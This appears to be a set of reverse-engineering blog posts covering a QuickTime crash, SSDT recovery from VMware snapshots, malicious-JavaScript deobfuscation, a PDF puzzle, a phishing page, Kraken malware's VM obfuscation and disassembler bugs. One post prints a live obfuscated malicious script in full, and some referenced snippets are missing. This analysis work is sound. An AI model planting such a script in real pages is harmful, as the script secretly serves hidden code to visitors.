QTPlayerSession.xml (located under %USERPROFILE\Application Data\Apple Computer\QuickTime\) is used to store various user settings. Among all, it’s used to save a list of favorite movies, and a list of the recent opened files. These lists are called FavoritesListName and MRUListNameWithURLs, here is a possible definition:



There’s a *key* definition followed by an *array* keyword. Inside the *array* tags QuickTime saves some values.
A single item is composed by two lines, the first one (“test 1″) represents the name showed by QuickTime while the other (“C:\Programs\QuickTime\Sample.mov”) is the path of the file. No matter what you write inside the string tag, QuickTime doesn’t check if the text is valid or not.
When QuickTime is fully loaded you can see the items from the *favorites* and *open recent* menu items (I don’t know the right english item’s names because I have an italian version of the software).

When QuickTime starts, it retrieves all the possible information parsing the xml file. It scans MRUListNameWithURLs values, and after that it checks FavoritesListName list. Like every parser, it scans the file tag by tag saving the content of each line inside the memory. When it has all the necessary structures stored inside the memory, the program proceeds retrieving the stored information in order to put them in the right places: *recent opened files* and *favorites files*.

QuickTime takes the values to put inside the two menu items running this piece of code:
1: movzx eax, word ptr [esi]
2: lea eax, [esi+eax*4+4]
3: lea eax, [eax+edi*4]

After instruction at line 2 EAX register points to a series of DWORD values, each DWORD value contains a pointer to a single information to retrieve; EDI represents the index because the dwords are taken one at a time. When MRUListNameWithURLS is checked I have something like:
EAX -> 68 D2 34 01 08 D3 34 01 D8 D3 34 01 50 D4 34 01 0D F0 AD BA AB AB AB AB
0134D268 points to a structure containing "Another test"
0134D308 points to a structure containing "C:\abc.mov"
0134D3D8 points to a structure containing "The last one"
0134D450 points to a structure containing "path"

The bytes above are stored inside a piece of memory allocated at runtime using RtlAllocateHeap function. Every time the snippet above will be executed the program will take a single string, depending on the index value. The items retrieved from the xml file are showed under the right menus when QuickTime is fully loaded. As I said before, there are two defined items for a single file so QuickTime always execute the code two times. The last 8 bytes pointed by EAX are not related with any string, they are just old bytes.

Can you understand what I’m trying to say?
The xml file is updated by QuickTime, but you can edit it. The problem occours when you modify FavoritesListName and MRUListNameWithURLs a little, using something like:



You can modify FavoritesListName in the same way. Of course you can define some more items. The point is that QuickTime is not able to handle item definition without the necessary two lines (name to display and path of the file) inside MRUListNameWithURLs and FavoritesListName; writing down 1 or 3 or 5 or 7 (or 9…) lines between *array* tags you’ll get the same result, a crash.
Why? Well, because the program will take the next not initialized 4 bytes and you don’t know what they are.

I could be wrong, but I don’t think it’s possible to exploit it. It’s a bug that can lead to a sort of denial of service because the crash occours in the initialization process. If your copy crashes you can try checking the xml file.

Some time ago I blogged about Vmware snapshots introducing a way to recognize hidden files by simply comparing two snapshots. I wanted to extend my research on the subject a little bit more, but I didn’t. I got the opportunity to put my hands on some snapshots again in these days. I haven’t anything on my mind, but I was surprised by some coincidences. Look at the information below:

80544bc0: 804fc624 00000000 0000011c 804fca98
80544bd0: bf995ba8 00000000 0000029a bf98f5f8
80544be0: 00000000 00000000 00000000 00000000
80544bf0: 00000000 00000000 00000000 00000000

00544BC0: 24C6 4F80 0000 0000 1C01 0000 98CA 4F80 $.O………..O.
00544BD0: A85B 99BF 0000 0000 9A02 0000 F8F5 98BF .[..............
00544BE0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00544BF0: 0000 0000 0000 0000 0000 0000 0000 0000 ................

First 4 lines are taken from Windbg while I was debugging an XP sp1 virtual machine running under Vmware; last 4 lines are taken from a saved Vmware snapshot (same os of course).
Do you see anything useful? These are KeServiceDescriptorTable[0],[1],[2],[3] and they have of course the same bytes, but there’s something else. There’s a connection between the addresses on the first lines and the offsets on the second ones, just remove the first 2 digits from the address. Do you see it? Look here: 80544BC0/544BC0, 80544BD0/544BD0, 80544BE0/544BE0, 80544BF0/544BF0.

Seems like the kernel memory is stored inside the snapshot. It’s not totally true indeed, there’s only a part of the kernel memory stored inside a Vmware’s snapshot. All the KeServiceDescriptorTable entries are present btw.
SSDT is inside the snapshot I have and it’s complete; SSDT Shadow seems to be inside the snapshot too, but there’s no real connection between kernel memory/snapshot addresses and it’s not complete (it needs some more research btw).

Is it only a coincidence? I tried with some XP machines and the result is the same, it’s possible to obtain real information of SSDT. According to Kayaker’s test it should work on win2k (don’t remember the service pack he was using…).

With this new information it’s pretty easy to code a SSDT revealer. I gave it a try and here is a result:

You can use the program to display SSDT entries and to find out modified entries too by simply comparing an original snapshot with another one.

To retrieve information from a snapshot you have to provide the address of KeServiceDescriptorTable[0] (something like 80544BC0, no “0x” prefix), and you have to select the OS of the virtual machine. After that you can:
1. save an untouched SSDT using the button labelled “Create untouched SSDT”
2. retrieve SSDT information from a snapshot by simply pushing the button labelled “Get snapshot SSDT”. Checking “Load untouched SSDT data” you can compare the original table (previously saved) with the one from the snapshot you’ll select. If a service has been changed you’ll read the word “YES” in the last column.

I took the name of the services from this table: http://metasploit.com/users/opcode/syscalls.html
I can’t test all the OS, if you find one or more errors drop me a mail.

Following this method it’s also possible to get the list of the running processes/modules, more about this later.

SSDT from snapshot

Most of the malicious javascripts out there are sometimes encrypted using commercial tools or, most of the time, using home made tricks. Is it really necessary? I mean: if you want to protect your page, do you really need an encryption tool?

I think the answer is no, it’s a useless waste of time (and sometimes money). Most of the time an automatic decoder is able to show the original code in few milliseconds, and when it fails you can use your brain… not so fast but it helps you to solve the puzzle for sure.
Even if you are able to fool one or more automatic decoder it doesn’t mean you have protected your script from unwanted eyes.

A simple proof is given by a piece of code I found at EvilCry’s blog. The code I’m referring to is:

<html><head><Meta Name=Encoder Content=HTMLSHIP>
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<noscript><iframe></iframe></noscript>
<script language="javascript">
<!--
jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDiDnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]xx\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDyn\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^L\^\(\`\nDyyK\;2AnW\(m\!L\$")
//-->
</script>
<ScrIPt lANGUAGE=jAVASCRiPt>
lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWdWDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSSSMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSSSMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDPI000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nSd3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQdp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")
</script>
</head><body><noscript><b>
<font color=red>This page requires a javascript enabled browser!!!</font></b></noscript>
</body></html>

Quite awfull indeed. I wanted to see the script code and, as always, I tried using some automatic decoders. The first script was easily decoded, but not the second one. I tried combining the scripts into only one without luck (it should work but I failed, don't know why...). The few decoders I tried were not able to give me a good result. I didn't try searching the net for some more decoders, but I decided to figure it out myself.

The second script starts with: lW4("MGN and ends with O\=m") characters sequence. It's like a generic call where lW4 represents the name of the function to call and the string inside " is the parameter, a very long string. To confirm this idea I need to find the function inside the first script. Here's the search result: lW4(uO49){
I'm on the right way, the line above is pretty similar to the first part of a function declaration. It's time to make the first script as readable as I can.

The script contains useless declarations (jL0 is declared two times, you can remove first one), useless variables (nB73 is not used) and useless strings (you can remove strings like "0u\%N\{\{I\{\\" or 0.1261199). It's pretty easy to remove them, the result I got is showed below:

yU90='\|\:T2B\ m\(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,\@\#dcWU\}\%LE\&nG0\~ekzh\)',
jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';

function lW4(uO49)
{
	l=uO49.length;
	w='';
	while(l--)
		o=jL0.indexOf(uO49.charAt(l)),
		w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;
	jL0=jL0.substring(1)+jL0.charAt(0),
	document.write(w);
};
lW4("2nW...");

Two strings, a function and a call to the function. Puzzle solved!
The scripts are used to decrypt two pieces of code, to see them I inserted an alert(w) instruction right after document.write(w). It’s the fastest wasy to see the code. If you read EvilCry’s post you should know the content of the first decrypted code, the other one is:

Just yesterday I had the opportunity to take a look at a sort of obfuscated Javascript code I have never seen before. The script contains a class named KyD defined using the prototype pattern. The code is something like this:

function KyD() {};

KyD.prototype = {
install : function()
{
...
},
cookieName:'feadcbhg',
getFrameURL : function()
{
...
},
...
};

var o44o=new KyD();
o44o.install();

More or less a standard class declaration. The constructor is empty, it doesn’t need special initial operation. Just after the class definition there are two more lines, a new KyD object is declared and the method “install” will be called.

For me it’s quite uncommon to see a class declaration inside a malicious script, I’m always used to see Javascript code using procedural paradigm. Anyway, this is not a problem of course. The problem arises looking at the declared methods. It’s often easy to understand a Javascript function from the source code, but not this time. Look at this snippet taken from one of the method declared inside KyD class:

Are you able to tell me the content of “o” in few seconds? Even if you know how to handle s you’ll need more than few seconds in order to solve the puzzle.
How to sort out the real meaning of the string? The script has been obfuscated using regular expressions; nothing impossible, but if you want to identify the content of the string s you need to know something about regexp.

How can regexp be used to obfuscate a string?
The string s is composed by 3 parts, two of them are obfuscated substrings while the other one is obtained by getFrameURL, another method of the class KyD.
The substrings have a replace method applied, in this specific case the method is used to search and replace characters from the string with regular expressions. The method is originally used to replace some characters with some other characters in a string:

stringObject.replace(findstring,newstring)

Here is how to use the method:

var s = "Say Hello";
document.write(str.replace(/Hello/, 'Ciao'));

The output will be “Say Ciao”, pretty easy. It’s also possible to use some more options, i.e.:
- i: used to perform a case insensitive search
- g: used to perform a global search over the entire string.

Back to our snippet. Looking at the first substring you’ll see that the replace method is used in this way:

replace(/[%\)@QI]/g, '')

g option is present and the new string is NULL, it means that part of the string will be cutted away. Which part of the string will be removed? The string to find is defined as a regular expression, everything inside square brackets (‘[' and ']‘) will be replaced with NULL. Removing the specified characters from the substring you’ll obtain the de-obfuscated substring:

Now I can decode all the strings obtaining the original script!
Quite a nice trick. It forces you to spend some more time over a script, nothing more. Thanks to Bobby for the script.

There was a challenge today at Didier Stevens’s blog . It’s a pdf puzzle, the goal is to find out the passphrase hidden inside the file.

Opening the file with a pdf reader you’ll see the text:
“The passphrase is XXXXXXXXXXXXXXXXXXX”.
Passphrase is not a sequence of ‘X’ for sure. How to find it out?

Didier gave us a little hint: “There’s a very simple solution just requiring Notepad”. Opening the file with notepad reveals the complete structure of the pdf file. The phrase is not inside the file; after a better glimpse at the file I notice these lines:
5 0 obj
...
/Filter /ASCII85Decode
...
stream
6<#'\7PQ#@1a#b...

This is the definition of an object, as you can see it’s encoded using ascii85. Using a decoder it’s pretty easy to retrieve the required passphrase: “Incremental Updates”.

Is it really necessary to use an ascii85 decoder?
There are two suspicious snippets inside the file indeed; the first snippet is the one you see above, and the other one is:
5 0 obj
...
/Filter /ASCII85Decode
...
stream
6<#'\7PQ#@1a#b...

They are two almost equal objects. There are only some different bytes in the encoded strings. The first and the last part of the encoded strings are the same, it means they have the same operators. i.e. if the object is used to display a text string they can have the same coordinates.

Ok, I have two streams but only one will be showed. Who decide what to display or not?
A pdf file contains a Cross Reference table which is used to define all the objects that are inside the file. A table is something like:

xref
0 7
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000419 00000 n
0000000594 00000 n

There are 7 object defined. Checking each object offset (the number in the first column) you’ll find out that only one stream is defined. The other one is not defined in this table because there’s another Cross Reference table at the end of the file:

xref
0 1
0000000000 65535 f
5 1
0000000935 00000 n

It’s pretty obvious now, the second stream (text with xxx) will be written over the first one (text with password).
To see the right text I removed some bytes from the end of the file. You can remove all the bytes after the first “%%EOF” occurrence.
Now you can see the hidden passphrase without using an ascii85 decoder. Nice challenge!

Lunch break ends now…

There are a lot of online storage services around the net, private or public. With this kind of services it’s pretty easy to save/share personal data. There’s a huge use of this kind of services, especially the ones that let you share files. They offer a free service (you often have a sort of Mb limit) and a fee service (no limit). I never tried uploading a file but I sometimes download files using Rapidshare, the most popular I think.

Like every fee service it’s prone to phishing/fraud. I stumbled on a phish site just today when I wanted to download an archive. As always you click on a link and the initial Rapidshare page appears. Not this time.

The Rapidshare’s link was obscured using ProtectLinks. The address of the archive appears like: “http://protect-links.com/_a_number”. They simply assign a number to a specific web page displaying the content of the web page in this way:

It’s an empty page with a definition of an iframe at the end. iframe tag is used to create an inline frame that contains another document. You can set one or more attributes (frameborder, height,name, width and src), I’m interested in the src attribute only. src is used to define the url of the document to show inside the iframe. From what I have seen that’s how protect-links protects a web page.

This is only one of the services available around the net. In general, I don’t know why people need to protect a page with this kind of services btw.

Anyway, how to protect a rapidshare link? A classic rapidshare link looks like:
http://rapidshare.com/files/_a_number_/_filename_
A protected link declared inside the src attribute looks like:
src=”http://_server_name_path/?link=_original_url_”
_orignal_url_ is the parameter passed to the php page and it represents the original rapidshare link.

Trying to download the file I got this page:

The image above represents an error message, it’s generally displayed when you don’t have a premium cookie saved on your system. This is not the common page I see when I want to download a file. Normally, the original page contains two boxes and it lets you decide to use a free or a premium service. Hitting the premium button without a premium cookie you get this kind of error message.

The page is well defined, the design is like the original one but it’s a fake page. Inspecting some menu items you’ll see that they don’t have the same initial part of the url, they point to two different servers.
Anyway, if you are a registered premium user and you see the error message you simply use your account to login… that’s the problem, when you hit the login button you won’t see anything else than a white page. The result is obvious, your data are now property of someone else.

Can you understand why some people need to protect the link? Well, when a link has been protected you can’t see the original url… and you don’t know where you are sending your login details. This is an unfair use of the protector service for sure.

What to do to protect ourselves from this kind of fraud?
There’s a security advise at rapidshare.com, part of the text sound like: “Generally you should never enter your login information on any websites other than rapidshare.com. Your account information would most likely be stolen.”. That’s a good hint to follow!

Kraken is the word of the month for sure, but it has nothing to do with the beast from an old nice book written by Jules Verne, Twenty Thousand Leagues Under the Sea.
The word refers to a series of malwares, something like the Storm trojan, but with much more strength. Kraken seems to be out from August 2006, but until today I’ve never heard about it. Some days ago I read an article about it, the interesting part is here:
“One somewhat interesting feature of the code is that the binary is not packed, as many malware binaries tend to be. However, Royal said that the code does have some other forms of obfuscation that make it difficult to analyze completely.”. I decided to look at it.

I’m not going to give out a detailed explanation about the sample I’m working on (MD5 = 592523a88df3d043d61a14b11a79bd55), but I’ll spend some words on the “forms of obfuscation” used by the malware.

Detectors are not able to recognize any specific packer/protector. The file is not packed, but from the first lines of code it’s pretty easy to understand that a sort of obfuscation/encryption was included inside the file. I have not found interesting imports/strings, so I tried running the malware. Just to be sure to retrieve some useful information I started logging all API(s) called by the malware.
The malware calls some nice functions. Almost all the code of the binary file has been decrypted at runtime. The malware spawns one file and it deletes itself, you can spy the decrypted code but I didn’t get anything useful from it. The best thing to do is to look at the code trying to identify a general obfuscation scheme or a decryption routine. Don’t think to trace the entire exe, it’s madness!

In case like this one, if you are able to see a light over your head you are lucky, otherwise you can step and look at each instruction for the eternity. I was lucky… the real code has been hidden behind a virtual machine. I’m not a virtual machine expert for sure, I only read some articles about this kind of protection.
I won’t rebuild the entire machine, I’ll give out my findings only. If you think they are wrong and/or you want to add some more information about the virtual machine I’ll be happy to see a comment from you.

Like every virtual machine out there, after a little initialization it goes into a semi-infinite loop that starts at 4012DA. It simply selects a virtual machine instruction and jump to the code to run. There are a lot of instructions inside the loop, avoiding some junk code you can see the snippet used to select (and then jump to) the next instruction to execute:

004012E4 MOV AL,BYTE PTR DS:[ESI-1] // Byte pointed by esi-1 decides everything
004012F3 ADD AL,BL
0040F807 DEC AL
004103D9 DEC ESI // Shift to the next byte
004103E7 ROL AL,2
004103F7 DEC AL
0040F590 XOR AL,0CF
0040F594 SUB AL,6B
004104A6 ADD BL,AL
004104AF MOVZX EAX,AL
004104B7 MOV ECX,DWORD PTR DS:[EAX*4+40FABB] // EAX = index of the selected instruction
004104C6 NOT ECX
0040129C ROR ECX,1C
00410213 SUB ECX,4DCBE90C
0041021F ROL ECX,7
00410229 INC ECX
0041070D BSWAP ECX
00401195 ADD ECX,5E1E81EF
0040119C XOR ECX,77B911BC
004011AE NOT ECX
0041071B ADD ECX,60334BE6 // ECX = address of the selected instruction
0040FFF3 MOV DWORD PTR SS:[ESP+48],ECX
0040FFFB PUSH DWORD PTR SS:[ESP+48]
0040FFFF RETN 4C // Go to the selected instruction

Everything starts from the value stored inside the buffer pointed by (esi-1), the buffer contains a series of bytes and they are used to select the virtual machine instruction to execute (Moreover they are used to retrieve one or more vm_instruction’s operand). The new value stored inside EAX (obtained after some minor operations) is used to retrieve a dword value, EAX represents the index of the vector that starts at 0×40FABB. As you can see from the code above the new value is used to obtain the address of the vm_instruction to execute.
Unlike a classical virtual machine this one doesn’t have a clear Instruction Table, spying the dead list from your favorite disassembler you won’t see the address of every single vm_instruction. The Instruction Table has been crypted and the first entry is located at 0×40FABB (there are 256 entries).
The virtual machine has 16 registers (from r_0 to r_15), they can be used to store byte, word or dword data. EDI register points to the first one, the registers are stored in memory consecutively starting from r_0 to r_15.
The virtual machine has a stack with a fixed size, EBP register contains the vm_esp value. After almost all push vm_instructions there’s a stack overflow check. The alignment is two bytes, “push byte_value” is not allowed and to push a single byte the virtual machine will extend the byte to a word value.

Is there a cmp/test instruction inside the snippet? Is there a reference to a vm_eip register? Seems like this virtual machine doesn’t need them. vm_eip is replaced by (esi-1), it’s not an eip per se but it *guides* the virtual machine. I haven’t all the vm_instructions on my notes but I think there are no direct cmp/test instructions. Seems like they are not included inside the virtual machine, strange.

From what I have seen there are more than 45 vm_instructions included in the virtual machine, to identify each vm_instruction you have to remove a lot of junk code. Once you have all the vm_instructions it’s not immediate to understand what the malware is trying to do.
Example: here are the vm_instructions used to patch a dword at 0×41CE06 (1° column represents the initial address of the vm_instruction, 2° column represents the name I gave to the vm_instruction):

401028: push_dword val // push F440C1CB
401028: push_dword val // push 8040414A
40F5BE: nor_stack // The value at vm_esp+4 is updated with a nor(vm_esp+4, vm_esp) operation
4105FA: pop_dword r_i // r_15 = 0x00000202
40F36F: push_dword r_i // r_0 = 0x0041CE05
401028: push_dword val // push 98754A9F
401028: push_dword val // push 43179031
40F198: push_dword vm_esp // push vm_esp
401396: mov_stack_pstack // mov dword ptr [vm_esp], dword ptr [dword ptr [vm_esp]]
40F25C: pop_word r_i // r_14 = 0x00009031
401028: push_dword val // push 678AB562
40F198 push_dword vm_esp // push vm_esp
40FEF3: push_bdword val // push 0x00000006, push a dword but the last 24 bits are 0, so it's like a push byte extended to dword
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp]
4105FA: pop_dword r_i // r_15 = 0x216
40F0A0: pp_mov_dword // mov dword ptr [pop t1], (pop t2)
40F25C: pop_word r_i // r_11 = 0x015E4317
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp] <-- 98754A9F + 678AB562 = 1
4105FA: pop_dword r_i // r_14
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp] <-- 41CE05 + 1 = 41CE06
4105FA: pop_dword r_i // r_15
410171: mov_stack_pstack // mov dword ptr [dword ptr [vm_esp]], dword ptr [vm_esp+4] <-- patch

Quite a simple patch operation, but the author didn’t use the straight way for sure. Believe it or not, this is the nature of the malware. Now you can understand the phrase: “Don’t think to trace the entire exe, it’s madness!”.

I tried inspecting some more samples of the same Kraken family. There are some similarities/differences:
- they are protected by a virtual machine too
- the routine used to select the next vm_instruction is not the same
- (I think) the vm_instructions are equal, but they are not defined in the same way. I mean, the code used to define a push is not the same but the result is the same infact in both cases you have a push vm_instruction
- the (encrypted)Instruction Table is not the same. At index i you won’t have the same vm_instruction for malware_x and malware_y
- the vm protection exists for the spawned file too

Now I fully understand the words used by the author of the interview, it’s complex to understand what’s going on…

Just yesterday a new version of Ollydbg was released, but I’m still using the old 1.10 version. It’s a really good debugger and until some days ago I did hit on few errors inside the disasm engine, nothing compared with Ida’s bug btw. Look here:

0047C720 6E OUTS DX,BYTE PTR ES:[EDI]
0047C721 6F OUTS DX,DWORD PTR ES:[EDI]

According to Intel Manual’s opcode map 0×6E is defined as “OUTS/OUTSB DX, Xb”.
The first operand is DX register, and the second one is defined as an “Xb” operand.
X: memory addressed by DS:(E)SI…
b : byte, regardless of operand-size attribute
The error is obvious, Ollydbg shows EDI instead of ESI.

There’s something similar with A6 opcode. Ollydbg v1.10 shows:
004012FA A6 CMPS BYTE PTR DS:[ESI],BYTE PTR ES:[EDI]
but the right line is:
004012FA A6 CMPS BYTE PTR DS:[EDI],BYTE PTR ES:[ESI]

It’s an oversight on X and Y addressing method.
The errors occour in v1.10 only, v2 shows the right instructions. I asked to Olly (Oleh Yuschuk) and he kindly replied: “Unfortunately, I will not correct it in 1.10…This project is closed, and I don’t want to make any modifications.”. Ok, I’ll switch to v2.

Few days ago I was inspecting a malware using my disassembler, and I stumbled on this piece of code:

C6 diZaZZembler

I use “!?!?!” string for undefined/reserved opcode. I had some problems testing reserved opcodes so I decided to check this case carefully. The first check is given by a comparative method, I loaded the malware into IDA. Look here:

c6 Ida

The first thing I thought of was: “Damn, there’s a bug inside my disasm engine”.

I took a look at the printed version of my “Intel® IA-32 Architectures Software Developer’s Manual – Volume 2B: Instruction Set Reference, N-Z”. According to one-byte opcode map, C6 opcode is defined as a “Grp 11 (1A) – MOV”.

What does it mean?
The opcode can’t give me the exact meaning of the instruction. I need some extra information, which are given by the opcode extension: ModR/M byte (0×22 in the example). To retrieve the necessary information about this opcode I have to check a new table: “Opcode Extensions for One- and Two-byte Opcodes by Group Number”. I’m interested in row denoted as Group_11:

Group 11

This is only a part of the entire table, it shows the header and the row of the group I’m focused on.

ModR/M byte is divided into 3 parts: mod, nnn and r/m.
0×22 = 00100010b
mod = 00 (bit 7, 6)
nnn = 100 (bit 5, 4, 3)
r/m = 010 (bit 2,1,0)

These numbers help you to locate the right instruction definition into the opcode extension’s table. To make things short, nnn value identifies the right cell to pick out. In this case 100b points to a blank cell, what does it mean?
According to Intel manual: “All blanks in all opcode maps are reserved and must not be used. Do not depend on the operation of undefined or reserved opcodes“.

Is it really an invalid instruction? All my initial investigations were done using the printed version of the Intel manual, and since of I had found some errors in it I decided to look at the most recent online version.
This new check doesn’t change anything, seems like IDA is able to disassemble an invalid instruction. Weird.

Now the question is: is this a bug or do they (IDA’s developers) know how to handle undocumented opcodes? To answer this question I have two options:
1. try loading the malware into some more disassemblers
2. try stepping the instruction using a debugger

Option number 1
Windbg’s output:

c6 Windbg

Ollydbg’s output

c6 Ollydbg

The result is the same, it’s an invalid instruction.

Option number 2
This is the last check I did. I wrote a new exe file including an instruction with C6 opcode in it. The program is really simple and the source is right here:

.text:00401000 BA B2 10 40 00 mov edx, offset word_4010B2
.text:00401005 C6 22 FB mov byte ptr [edx], 0FBh
.text:00401008 6A 00 push 0
.text:0040100A 68 1D 30 40 00 push offset Caption
.text:0040100F 68 55 30 40 00 push offset Text
.text:00401014 6A 00 push 0
.text:00401016 E8 91 00 00 00 call MessageBoxA
.text:0040101B C3 retn

According to Ida it should move a byte inside 0×4010B2 address (it has full access) showing a simple messagebox, nothing more. Unfortunately the result is not the same.

If you run the file without a debugger it crashes and the classic error box appears. Spying inside the message error’s box I see that the error occours at offset 0×1005, C6 opcode!
If you run the file with Ollydbg you’ll get almost the same result, the debugger stops signalling the error “Illegal instruction” at 0×401005. Again, C6 opcode!
If you run the file using IDA’s debugger you’ll get a simple warning: “An attempt was mode to execute an illegal instruction (0×401005)”. After that you’ll get a sequence of error boxes, seems like Ida’s debugger is not fully able to handle execution of illegal instruction…this is another story, btw.

I did some more test and seems like the problem occours with all the *blank cells*; I tried with all the possible C6 combinations and with some different opcodes too. The result is always the same, Ida shows a disassembled instruction which is totally wrong!!!

I tried reading Ida’s help file but there was no mention about the problem, I don’t think there’s an hidden option to set. I tried googling without luck. Due to this fact I’m not 100% sure but… I think it’s a bug!

Among all the precious information retrieved by Ida there’s something I always use when I need to study a target: stack frame. It’s quite useful when you want to see the list of parameters and local variables, but it would be great to see the size of each item. Yes, you can get the length but you have to calculate it each time. I sometimes need this kind of information, especially when I have to deal with fixed length buffers. I tried inspecting through some Ida’s menu without luck, it’s strange that Ida doesn’t provide such information so I decided to write a little idc script able to retrieve local *big* buffers. (If there’s an Ida hidden feature please tell me…)

I wanted to attach the original script I wrote here, but I think it’s much more useful to explain some details about the functions I used leaving the script to you as an exercize. In this simple example I’ll show you how to find out the length of each item inside a stack frame. Let’s start with a simple function:

stack frame 1

The stack frame created by Ida is divided into some parts, it looks like a sequence of fields:

- local variables
- saved registers
- return address
- function parameters

Looking at the picture above is pretty easy to locate local variables (ObjectAttributes, KeyValueInformationLength, ResultLength) and function parameters (Handle, ValueName). Moreover you can guess the length of each item. According to the four parts I mentioned above there are some more items that are not specified by Ida, I’m referring to “saved registers” and “return address”. If you look at the offset of each item you’ll surely find out something odd. Look at the gap between ResultLength and Handle: 0×0C bytes. 4 bytes are reserved for ResultLength variable, but there are 8 unreferenced bytes. It’s time to take a look at the stack frame window (ctrl-k):

Stack frame 2

Here is the answer. Ida uses two special fields named ” r” and ” s”, the length of each field is 4 bytes. They are the “return address” and the “saved registers”.

Ok, how to get the size of the items using an idc script? As you can see from the picture the stack frame looks like a structure definition, the idea is to read each item in sequence.

#include <idc.idc>

static main()
{
auto id, i, firstM, lastM, address;
auto mName, mSize, mFlag;

address = 0×00013C92; // Address of the function to check
id = GetFrame(address);
firstM = GetFirstMember(id);
lastM = GetLastMember(id);

for(i=firstM;i<=lastM;i++)
{
mName = GetMemberName(id,i); // Get the name
mSize = GetMemberSize(id, i); // Get the size (in byte)
mFlag = GetMemberFlag(id, i); // Get the flag
Message(“\n%s %d %x”, mName, mSize, mFlag);
}
}

